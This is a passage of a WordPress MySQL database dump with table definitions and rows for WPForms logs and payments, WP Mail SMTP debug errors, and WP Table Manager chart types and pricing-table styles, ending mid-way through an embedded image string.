INSERT INTO `wp_wpforms_logs` VALUES (1,'Migration','Migration of WPForms to 1.9.1 started.','log','2024-09-26 20:51:53',0,0,0),(2,'Migration','Migration of WPForms to 1.9.1 completed.','log','2024-09-26 20:51:53',0,0,0),(3,'Migration','Migration of WPForms to 1.9.1.1 is fully completed.','log','2024-09-26 20:51:53',0,0,0),(4,'Migration','Migration of WPForms to 1.9.1.2 is fully completed.','log','2024-09-27 20:48:34',0,0,0),(5,'Migration','Migration of WPForms to 1.9.1.3 is fully completed.','log','2024-10-02 20:33:13',0,0,0),(6,'Migration','Migration of WPForms to 1.9.1.4 is fully completed.','log','2024-10-17 20:37:10',0,0,0),(7,'Migration','Migration of WPForms to 1.9.1.5 is fully completed.','log','2024-10-23 20:40:54',0,0,0),(8,'Migration','Migration of WPForms to 1.9.1.6 is fully completed.','log','2024-10-28 21:05:38',0,0,0),(9,'Migration','Migration of WPForms to 1.9.2 started.','log','2024-11-07 21:43:36',0,0,0),(10,'Migration','Migration of WPForms to 1.9.2 completed.','log','2024-11-07 21:49:35',0,0,0),(11,'Migration','Migration of WPForms to 1.9.2.1 is fully completed.','log','2024-11-07 21:49:35',0,0,0),(12,'Migration','Migration of WPForms to 1.9.2 completed.','log','2024-11-07 21:49:35',0,0,0),(13,'Migration','Migration of WPForms to 1.9.2.1 is fully completed.','log','2024-11-07 21:49:35',0,0,0),(14,'Migration','Migration of WPForms to 1.9.2.2 is fully completed.','log','2024-11-18 21:55:48',0,0,0),(15,'Migration','Migration of WPForms to 1.9.2.3 is fully completed.','log','2024-12-03 21:47:48',0,0,0),(16,'Migration','Migration of WPForms to 1.9.3.1 is fully completed.','log','2025-01-16 21:51:10',0,0,0),(17,'Migration','Migration of WPForms to 1.9.3.2 is fully completed.','log','2025-01-28 21:57:42',0,0,0),(18,'Migration','Migration of WPForms to 1.9.4.1 is fully completed.','log','2025-02-27 22:20:59',0,0,0),(19,'Migration','Migration of WPForms to 1.9.4.2 is fully completed.','log','2025-03-12 20:54:01',0,0,0),(20,'Migration','Migration of WPForms to 1.9.5 is fully completed.','log','2025-04-24 20:24:34',0,0,0),(21,'Migration','Migration of WPForms to 1.9.5.1 is fully completed.','log','2025-04-29 20:30:31',0,0,0),(22,'Migration','Migration of WPForms to 1.9.5.2 is fully completed.','log','2025-05-05 20:42:05',0,0,0),(23,'Migration','Migration of WPForms to 1.9.5.2 is fully completed.','log','2025-05-05 20:42:05',0,0,0),(24,'Migration','Migration of WPForms to 1.9.5.2 is fully completed.','log','2025-05-05 20:42:05',0,0,0),(25,'Migration','Migration of WPForms to 1.9.5.2 is fully completed.','log','2025-05-05 20:42:05',0,0,0);
/*!40000 ALTER TABLE `wp_wpforms_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_payment_meta`
--

DROP TABLE IF EXISTS `wp_wpforms_payment_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_payment_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `payment_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `payment_id` (`payment_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `meta_value` (`meta_value`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_payment_meta`
--

LOCK TABLES `wp_wpforms_payment_meta` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_payment_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpforms_payment_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_payments`
--

DROP TABLE IF EXISTS `wp_wpforms_payments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_payments` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `status` varchar(10) NOT NULL DEFAULT '',
  `subtotal_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `discount_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `total_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `currency` varchar(3) NOT NULL DEFAULT '',
  `entry_id` bigint(20) NOT NULL DEFAULT 0,
  `gateway` varchar(20) NOT NULL DEFAULT '',
  `type` varchar(12) NOT NULL DEFAULT '',
  `mode` varchar(4) NOT NULL DEFAULT '',
  `transaction_id` varchar(40) NOT NULL DEFAULT '',
  `customer_id` varchar(40) NOT NULL DEFAULT '',
  `subscription_id` varchar(40) NOT NULL DEFAULT '',
  `subscription_status` varchar(10) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `date_created_gmt` datetime NOT NULL,
  `date_updated_gmt` datetime NOT NULL,
  `is_published` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `status` (`status`(8)),
  KEY `total_amount` (`total_amount`),
  KEY `type` (`type`(8)),
  KEY `transaction_id` (`transaction_id`(32)),
  KEY `customer_id` (`customer_id`(32)),
  KEY `subscription_id` (`subscription_id`(32)),
  KEY `subscription_status` (`subscription_status`(8)),
  KEY `title` (`title`(64))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_payments`
--

LOCK TABLES `wp_wpforms_payments` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_payments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpforms_payments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_tasks_meta`
--

DROP TABLE IF EXISTS `wp_wpforms_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) NOT NULL,
  `data` longtext NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=49 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_tasks_meta`
--

LOCK TABLES `wp_wpforms_tasks_meta` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_tasks_meta` DISABLE KEYS */;
INSERT INTO `wp_wpforms_tasks_meta` VALUES (1,'wpforms_process_forms_locator_scan','W10=','2022-10-10 21:56:58'),(2,'wpforms_admin_addons_cache_update','W10=','2022-10-10 21:57:22'),(3,'wpforms_admin_builder_templates_cache_update','W10=','2022-10-10 21:57:22'),(11,'wpforms_builder_help_cache_update','W10=','2022-10-19 06:09:29'),(17,'wpforms_admin_addons_cache_update','W10=','2022-11-16 02:27:51'),(18,'wpforms_admin_builder_templates_cache_update','W10=','2022-11-16 02:27:51'),(19,'wpforms_admin_addons_cache_update','W10=','2022-11-23 14:59:17'),(20,'wpforms_admin_builder_templates_cache_update','W10=','2022-11-23 14:59:17'),(21,'wpforms_admin_addons_cache_update','W10=','2022-12-01 06:58:06'),(22,'wpforms_admin_builder_templates_cache_update','W10=','2022-12-01 06:58:06'),(24,'wpforms_admin_addons_cache_update','W10=','2022-12-08 23:04:04'),(25,'wpforms_admin_builder_templates_cache_update','W10=','2022-12-08 23:04:04'),(26,'wpforms_admin_addons_cache_update','W10=','2022-12-17 00:23:27'),(27,'wpforms_admin_builder_templates_cache_update','W10=','2022-12-17 00:23:27'),(28,'wpforms_admin_addons_cache_update','W10=','2022-12-25 09:54:22'),(29,'wpforms_admin_builder_templates_cache_update','W10=','2022-12-25 09:54:22'),(30,'wpforms_admin_addons_cache_update','W10=','2023-01-01 23:00:29'),(31,'wpforms_admin_builder_templates_cache_update','W10=','2023-01-01 23:00:29'),(32,'wpforms_admin_addons_cache_update','W10=','2023-01-18 02:17:02'),(33,'wpforms_admin_builder_templates_cache_update','W10=','2023-01-18 02:17:02'),(34,'wpforms_admin_addons_cache_update','W10=','2023-01-26 02:09:06'),(35,'wpforms_admin_builder_templates_cache_update','W10=','2023-01-26 02:09:06'),(36,'wpforms_admin_addons_cache_update','W10=','2023-02-02 05:14:15'),(37,'wpforms_admin_builder_templates_cache_update','W10=','2023-02-02 05:14:15'),(38,'wpforms_admin_addons_cache_update','W10=','2023-02-10 00:48:47'),(39,'wpforms_admin_builder_templates_cache_update','W10=','2023-02-10 00:48:47'),(47,'wpforms_process_purge_spam','W10=','2024-09-26 20:51:52'),(48,'wpforms_process_purge_spam','W10=','2024-09-26 20:51:52');
/*!40000 ALTER TABLE `wp_wpforms_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpmailsmtp_debug_events`
--

DROP TABLE IF EXISTS `wp_wpmailsmtp_debug_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpmailsmtp_debug_events` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `content` text DEFAULT NULL,
  `initiator` text DEFAULT NULL,
  `event_type` tinyint(3) unsigned NOT NULL DEFAULT 0,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpmailsmtp_debug_events`
--

LOCK TABLES `wp_wpmailsmtp_debug_events` WRITE;
/*!40000 ALTER TABLE `wp_wpmailsmtp_debug_events` DISABLE KEYS */;
INSERT INTO `wp_wpmailsmtp_debug_events` VALUES (1,'Mailer: Google / Gmail\r\n{\n  \"error\": {\n    \"code\": 401,\n    \"message\": \"Request is missing required authentication credential. Expected OAuth 2 access token, login cookie or other valid authentication credential. See https://developers.google.com/identity/sign-in/web/devconsole-project.\",\n    \"errors\": [\n      {\n        \"message\": \"Login Required.\",\n        \"domain\": \"global\",\n        \"reason\": \"required\",\n        \"location\": \"Authorization\",\n        \"locationType\": \"header\"\n      }\n    ],\n    \"status\": \"UNAUTHENTICATED\",\n    \"details\": [\n      {\n        \"@type\": \"type.googleapis.com/google.rpc.ErrorInfo\",\n        \"reason\": \"CREDENTIALS_MISSING\",\n        \"domain\": \"googleapis.com\",\n        \"metadata\": {\n          \"service\": \"gmail.googleapis.com\",\n          \"method\": \"caribou.api.proto.MailboxService.SendMessage\"\n        }\n      }\n    ]\n  }\n}','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Reports\\/Emails\\/Summary.php\",\"line\":112}',0,'2022-02-14 08:30:09'),(2,'Mailer: Google / Gmail\r\n{\n  \"error\": {\n    \"code\": 401,\n    \"message\": \"Request is missing required authentication credential. Expected OAuth 2 access token, login cookie or other valid authentication credential. See https://developers.google.com/identity/sign-in/web/devconsole-project.\",\n    \"errors\": [\n      {\n        \"message\": \"Login Required.\",\n        \"domain\": \"global\",\n        \"reason\": \"required\",\n        \"location\": \"Authorization\",\n        \"locationType\": \"header\"\n      }\n    ],\n    \"status\": \"UNAUTHENTICATED\",\n    \"details\": [\n      {\n        \"@type\": \"type.googleapis.com/google.rpc.ErrorInfo\",\n        \"reason\": \"CREDENTIALS_MISSING\",\n        \"domain\": \"googleapis.com\",\n        \"metadata\": {\n          \"service\": \"gmail.googleapis.com\",\n          \"method\": \"caribou.api.proto.MailboxService.SendMessage\"\n        }\n      }\n    ]\n  }\n}','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wc-multivendor-membership\\/core\\/class-wcfmvm.php\",\"line\":1263}',0,'2022-02-15 00:35:45'),(3,'Mailer: Google / Gmail\r\n{\n  \"error\": {\n    \"code\": 401,\n    \"message\": \"Request is missing required authentication credential. Expected OAuth 2 access token, login cookie or other valid authentication credential. See https://developers.google.com/identity/sign-in/web/devconsole-project.\",\n    \"errors\": [\n      {\n        \"message\": \"Login Required.\",\n        \"domain\": \"global\",\n        \"reason\": \"required\",\n        \"location\": \"Authorization\",\n        \"locationType\": \"header\"\n      }\n    ],\n    \"status\": \"UNAUTHENTICATED\",\n    \"details\": [\n      {\n        \"@type\": \"type.googleapis.com/google.rpc.ErrorInfo\",\n        \"reason\": \"CREDENTIALS_MISSING\",\n        \"domain\": \"googleapis.com\",\n        \"metadata\": {\n          \"method\": \"caribou.api.proto.MailboxService.SendMessage\",\n          \"service\": \"gmail.googleapis.com\"\n        }\n      }\n    ]\n  }\n}','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wc-multivendor-membership\\/core\\/class-wcfmvm.php\",\"line\":1292}',0,'2022-02-15 00:35:46'),(4,'Mailer: Google / Gmail\r\n{\n  \"error\": {\n    \"code\": 401,\n    \"message\": \"Request is missing required authentication credential. Expected OAuth 2 access token, login cookie or other valid authentication credential. See https://developers.google.com/identity/sign-in/web/devconsole-project.\",\n    \"errors\": [\n      {\n        \"message\": \"Login Required.\",\n        \"domain\": \"global\",\n        \"reason\": \"required\",\n        \"location\": \"Authorization\",\n        \"locationType\": \"header\"\n      }\n    ],\n    \"status\": \"UNAUTHENTICATED\",\n    \"details\": [\n      {\n        \"@type\": \"type.googleapis.com/google.rpc.ErrorInfo\",\n        \"reason\": \"CREDENTIALS_MISSING\",\n        \"domain\": \"googleapis.com\",\n        \"metadata\": {\n          \"method\": \"caribou.api.proto.MailboxService.SendMessage\",\n          \"service\": \"gmail.googleapis.com\"\n        }\n      }\n    ]\n  }\n}','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wc-multivendor-membership\\/core\\/class-wcfmvm.php\",\"line\":1263}',0,'2022-02-15 01:45:38'),(5,'Mailer: Google / Gmail\r\n{\n  \"error\": {\n    \"code\": 401,\n    \"message\": \"Request is missing required authentication credential. Expected OAuth 2 access token, login cookie or other valid authentication credential. See https://developers.google.com/identity/sign-in/web/devconsole-project.\",\n    \"errors\": [\n      {\n        \"message\": \"Login Required.\",\n        \"domain\": \"global\",\n        \"reason\": \"required\",\n        \"location\": \"Authorization\",\n        \"locationType\": \"header\"\n      }\n    ],\n    \"status\": \"UNAUTHENTICATED\",\n    \"details\": [\n      {\n        \"@type\": \"type.googleapis.com/google.rpc.ErrorInfo\",\n        \"reason\": \"CREDENTIALS_MISSING\",\n        \"domain\": \"googleapis.com\",\n        \"metadata\": {\n          \"method\": \"caribou.api.proto.MailboxService.SendMessage\",\n          \"service\": \"gmail.googleapis.com\"\n        }\n      }\n    ]\n  }\n}','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wc-multivendor-membership\\/core\\/class-wcfmvm.php\",\"line\":1292}',0,'2022-02-15 01:45:40'),(6,'Mailer: Other SMTP\nSMTP connect() failed. https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/SetupWizard.php\",\"line\":1111}',0,'2022-02-16 02:57:30'),(7,'Mailer: Other SMTP\nSMTP connect() failed. https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":314}',0,'2022-02-16 02:57:45'),(8,'Mailer: Other SMTP\nSMTP connect() failed. https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-admin\\/includes\\/misc.php\",\"line\":1413}',0,'2022-02-16 02:59:10'),(9,'Mailer: Other SMTP\nSMTP connect() failed. https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting','{\"file\":\"\\/storage\\/v6964\\/mangomitra\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":314}',0,'2022-02-16 03:02:33'),(10,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/storage\\/v6964\\/gopalak\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/SetupWizard.php\",\"line\":1172}',0,'2022-10-28 04:29:28'),(11,'Mailer: Other SMTP\r\nSMTP Error: Could not authenticate.','{\"file\":\"\\/storage\\/v6964\\/gopalak\\/public_html\\/wp-content\\/plugins\\/wp-mail-smtp\\/src\\/Admin\\/Pages\\/TestTab.php\",\"line\":314}',0,'2022-10-28 04:29:40');
/*!40000 ALTER TABLE `wp_wpmailsmtp_debug_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpmailsmtp_tasks_meta`
--

DROP TABLE IF EXISTS `wp_wpmailsmtp_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpmailsmtp_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) NOT NULL,
  `data` longtext NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpmailsmtp_tasks_meta`
--

LOCK TABLES `wp_wpmailsmtp_tasks_meta` WRITE;
/*!40000 ALTER TABLE `wp_wpmailsmtp_tasks_meta` DISABLE KEYS */;
INSERT INTO `wp_wpmailsmtp_tasks_meta` VALUES (1,'wp_mail_smtp_summary_report_email','W10=','2022-02-10 10:34:21'),(5,'wp_mail_smtp_admin_notifications_update','W10=','2022-02-15 05:52:56'),(8,'wp_mail_smtp_admin_notifications_update','W10=','2022-10-14 10:43:42'),(22,'wp_mail_smtp_admin_notifications_update','W10=','2023-12-22 03:21:24');
/*!40000 ALTER TABLE `wp_wpmailsmtp_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wptm_categories`
--

DROP TABLE IF EXISTS `wp_wptm_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wptm_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(10) unsigned NOT NULL DEFAULT 0,
  `lft` int(11) NOT NULL DEFAULT 0,
  `rgt` int(11) NOT NULL DEFAULT 0,
  `level` int(10) unsigned NOT NULL DEFAULT 0,
  `title` varchar(255) NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT 0,
  `access` int(1) NOT NULL DEFAULT 1,
  `params` text NOT NULL,
  `themeparams` text NOT NULL,
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `idx_left_right` (`lft`,`rgt`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wptm_categories`
--

LOCK TABLES `wp_wptm_categories` WRITE;
/*!40000 ALTER TABLE `wp_wptm_categories` DISABLE KEYS */;
INSERT INTO `wp_wptm_categories` VALUES (1,0,1,4,0,'ROOT',0,1,'','','0000-00-00 00:00:00','0000-00-00 00:00:00',0),(2,1,2,3,1,'Category',0,1,'','','0000-00-00 00:00:00','0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `wp_wptm_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wptm_charts`
--

DROP TABLE IF EXISTS `wp_wptm_charts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wptm_charts` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `id_table` int(11) NOT NULL,
  `title` varchar(100) NOT NULL,
  `datas` mediumtext NOT NULL,
  `type` mediumtext NOT NULL,
  `config` text NOT NULL,
  `hash` varchar(32) NOT NULL,
  `params` text NOT NULL,
  `created_time` datetime NOT NULL,
  `modified_time` datetime NOT NULL,
  `author` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_table` (`id_table`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wptm_charts`
--

LOCK TABLES `wp_wptm_charts` WRITE;
/*!40000 ALTER TABLE `wp_wptm_charts` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wptm_charts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wptm_charttypes`
--

DROP TABLE IF EXISTS `wp_wptm_charttypes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wptm_charttypes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `config` mediumtext NOT NULL,
  `extra` text NOT NULL,
  `image` text NOT NULL,
  `ordering` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wptm_charttypes`
--

LOCK TABLES `wp_wptm_charttypes` WRITE;
/*!40000 ALTER TABLE `wp_wptm_charttypes` DISABLE KEYS */;
INSERT INTO `wp_wptm_charttypes` VALUES (1,'Line','{   \r\n    \"scaleShowGridLines\" : false,\r\n  \"scaleGridLineColor\" : \"rgba(0,0,0,.05)\"\r\n   \r\n}','','line.png',0),(2,'Bar','{\"scaleBeginAtZero\": true,\r\n \"scaleShowGridLines\" : true,\r\n \"scaleGridLineColor\" : \"rgba(0,0,0,.05)\",\r\n \"scaleGridLineWidth\":1,\r\n \"barShowStroke\" : true,\r\n \"barStrokeWidth\": 2,\r\n \"barValueSpacing\": 5,\r\n \"barDatasetSpacing\":10\r\n}','','bar.png',0),(3,'Radar','','','radar.png',0),(4,'PolarArea','','','polar_area.png',0),(5,'Pie','','','pie.png',0),(6,'Doughnut','','','doughnut.png',0);
/*!40000 ALTER TABLE `wp_wptm_charttypes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wptm_styles`
--

DROP TABLE IF EXISTS `wp_wptm_styles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wptm_styles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `data` mediumtext NOT NULL,
  `style` mediumtext NOT NULL,
  `css` text NOT NULL,
  `image` text NOT NULL,
  `ordering` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wptm_styles`
--

LOCK TABLES `wp_wptm_styles` WRITE;
/*!40000 ALTER TABLE `wp_wptm_styles` DISABLE KEYS */;
INSERT INTO `wp_wptm_styles` VALUES (1,'[[\"Details\",\"Basic\",\"Standard\",\"Premium\",\"Professional\"],[\"\",\"<div class=\\\\\"price_wrapper\\\\\">   <span class=\\\\\"currency\\\\\">$</span>   <span class=\\\\\"price\\\\\">19</span>   <span class=\\\\\"cents\\\\\">99<span class=\\\\\"recurrence\\\\\">year</span></span>    </div>\",\"<div class=\\\\\"price_wrapper\\\\\">   <span class=\\\\\"currency\\\\\">$</span>   <span class=\\\\\"price\\\\\">29</span>   <span class=\\\\\"cents\\\\\">99<span class=\\\\\"recurrence\\\\\">year</span></span>    </div>\",\"<div class=\\\\\"price_wrapper\\\\\">   <span class=\\\\\"currency\\\\\">$</span>   <span class=\\\\\"price\\\\\">49</span>   <span class=\\\\\"cents\\\\\">99<span class=\\\\\"recurrence\\\\\">year</span></span>    </div>\",\"<div class=\\\\\"price_wrapper\\\\\">   <span class=\\\\\"currency\\\\\">$</span>   <span class=\\\\\"price\\\\\">99</span>   <span class=\\\\\"cents\\\\\">99<span class=\\\\\"recurrence\\\\\">year</span></span>    </div>\"],[\"HDD Space\",\"500 MB\",\"1500 MB\",\"3000 MB\",\"5000 MB\"],[\"Monthly traffic\",\"20GB\",\"30GB\",\"50GB\",\"100GB\"],[\"Email addresses\",\"1\",\"10\",\"Unlimited\",\"Unlimited\"],[\"FTP Accounts\",\"1\",\"5\",\"50\",\"100\"],[\"Databases\",\"10\",null,null,null],[\"Hosted domain\",\"1\",\"3\",\"5\",\"10\"],[\"Dedicated IP\",\"<img width=\\\\\"20\\\\\" height=\\\\\"20\\\\\" title=\\\\\"\\\\\" alt=\\\\\"\\\\\" src=\\\\\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAABmJLR0QA/wD/AP+gvaeTAAABCElEQVQ4jbXUzUrDUBCG4cc/RPDC/NlJrQuNWhAVadd6DbpSUNeuvATBGzMkrXXRRI7x9DRBHJjV+ebNfCczh3+MdTxjv0PNER6w1jzYwDum+MRFC9iw0k7xVjX0HY/VQZ0lDhKwASaNmrtQcBgRlOL2TyLaMfaawn4FaQqzQHMV2Kwzx+48K7GvFzgzu7NxxEXqakAv0mksc+wsgoXQIgH7wHZbWB3DBHAwr2g5AdxMnC117e4m0V3994/bwq4XwDpBz/2eswKnuBQfm/482CgCy7EVaGIjNTGb3x+R+dvqlRqr99TFivjjcBsKVvAa2GyzAeHuv4iMYP3A9lrA6shwj9UONd3iC9iGlRe/FFUcAAAAAElFTkSuQmCC\\\\\" />\",\"<img width=\\\\\"20\\\\\" height=\\\\\"20\\\\\" title=\\\\\"\\\\\" alt=\\\\\"\\\\\" src=\\\\\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAABmJLR0QA/wD/AP+gvaeTAAABCElEQVQ4jbXUzUrDUBCG4cc/RPDC/NlJrQuNWhAVadd6DbpSUNeuvATBGzMkrXXRRI7x9DRBHJjV+ebNfCczh3+MdTxjv0PNER6w1jzYwDum+MRFC9iw0k7xVjX0HY/VQZ0lDhKwASaNmrtQcBgRlOL2TyLaMfaawn4FaQqzQHMV2Kwzx+48K7GvFzgzu7NxxEXqakAv0mksc+wsgoXQIgH7wHZbWB3DBHAwr2g5AdxMnC117e4m0V3994/bwq4XwDpBz/2eswKnuBQfm/482CgCy7EVaGIjNTGb3x+R+dvqlRqr99TFivjjcBsKVvAa2GyzAeHuv4iMYP3A9lrA6shwj9UONd3iC9iGlRe/FFUcAAAAAElFTkSuQmCC\\\\\" />\",\"<img width=\\\\\"20\\\\\" height=\\\\\"18\\\\\" title=\\\\\" alt=\\\\\" src=\\\\\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAAEs186GAAAKTWlDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVN3WJP3Fj7f92UPVkLY8LGXbIEAIiOsCMgQWaIQkgBhhBASQMWFiApWFBURnEhVxILVCkidiOKgKLhnQYqIWotVXDjuH9yntX167+3t+9f7vOec5/zOec8PgBESJpHmomoAOVKFPDrYH49PSMTJvYACFUjgBCAQ5svCZwXFAADwA3l4fnSwP/wBr28AAgBw1S4kEsfh/4O6UCZXACCRAOAiEucLAZBSAMguVMgUAMgYALBTs2QKAJQAAGx5fEIiAKoNAOz0ST4FANipk9wXANiiHKkIAI0BAJkoRyQCQLsAYFWBUiwCwMIAoKxAIi4EwK4BgFm2MkcCgL0FAHaOWJAPQGAAgJlCLMwAIDgCAEMeE80DIEwDoDDSv+CpX3CFuEgBAMDLlc2XS9IzFLiV0Bp38vDg4iHiwmyxQmEXKRBmCeQinJebIxNI5wNMzgwAABr50cH+OD+Q5+bk4eZm52zv9MWi/mvwbyI+IfHf/ryMAgQAEE7P79pf5eXWA3DHAbB1v2upWwDaVgBo3/ldM9sJoFoK0Hr5i3k4/EAenqFQyDwdHAoLC+0lYqG9MOOLPv8z4W/gi372/EAe/tt68ABxmkCZrcCjg/1xYW52rlKO58sEQjFu9+cj/seFf/2OKdHiNLFcLBWK8ViJuFAiTcd5uVKRRCHJleIS6X8y8R+W/QmTdw0ArIZPwE62B7XLbMB+7gECiw5Y0nYAQH7zLYwaC5EAEGc0Mnn3AACTv/mPQCsBAM2XpOMAALzoGFyolBdMxggAAESggSqwQQcMwRSswA6cwR28wBcCYQZEQAwkwDwQQgbkgBwKoRiWQRlUwDrYBLWwAxqgEZrhELTBMTgN5+ASXIHrcBcGYBiewhi8hgkEQcgIE2EhOogRYo7YIs4IF5mOBCJhSDSSgKQg6YgUUSLFyHKkAqlCa